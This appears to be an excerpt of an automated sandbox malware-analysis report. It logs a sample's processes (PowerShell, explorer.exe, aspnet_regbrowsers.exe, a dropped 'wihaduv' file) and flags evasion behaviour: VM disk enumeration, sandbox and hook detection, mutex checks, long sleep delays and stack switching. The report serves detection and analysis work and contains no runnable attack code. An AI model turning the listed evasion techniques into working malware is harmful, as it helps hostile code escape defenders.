Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wihaduv	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,

22_2_02C23862

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_24-887

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	API/Special instruction interceptor: Address: 7FF8418CE814
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	API/Special instruction interceptor: Address: 7FF8418CD584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: aspnet_regbrowsers.exe, 0000000D.00000002.1778697183.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Users\user\AppData\Roaming\wihaduv	Memory allocated: 1650000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wihaduv	Memory allocated: 3100000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wihaduv	Memory allocated: 2F00000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 22_2_02C216C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,

22_2_02C216C7

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wihaduv	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3635	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6118	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7587	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2039	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1390	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5388	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4386	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 415
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 921
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 598
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 830
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 830

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8144	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036	Thread sleep count: 7587 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep count: 2039 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6952	Thread sleep count: 1390 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672	Thread sleep count: 144 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844	Thread sleep count: 335 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492	Thread sleep count: 5388 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 936	Thread sleep count: 4386 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8044	Thread sleep count: 415 > 30
Source: C:\Windows\explorer.exe TID: 8024	Thread sleep count: 921 > 30
Source: C:\Windows\explorer.exe TID: 8024	Thread sleep time: -92100s >= -30000s
Source: C:\Windows\explorer.exe TID: 8048	Thread sleep count: 598 > 30
Source: C:\Windows\explorer.exe TID: 8048	Thread sleep time: -59800s >= -30000s
Source: C:\Users\user\AppData\Roaming\wihaduv TID: 3324	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2972	Thread sleep count: 47 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2972	Thread sleep time: -47000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 7308	Thread sleep count: 52 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 7308	Thread sleep time: -52000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4064	Thread sleep count: 48 > 30
Source: C:\Windows\explorer.exe TID: 4064	Thread sleep time: -48000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6032	Thread sleep count: 39 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 6032	Thread sleep time: -39000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4560	Thread sleep count: 44 > 30
Source: C:\Windows\explorer.exe TID: 4560	Thread sleep time: -44000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02972B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	19_2_02972B15
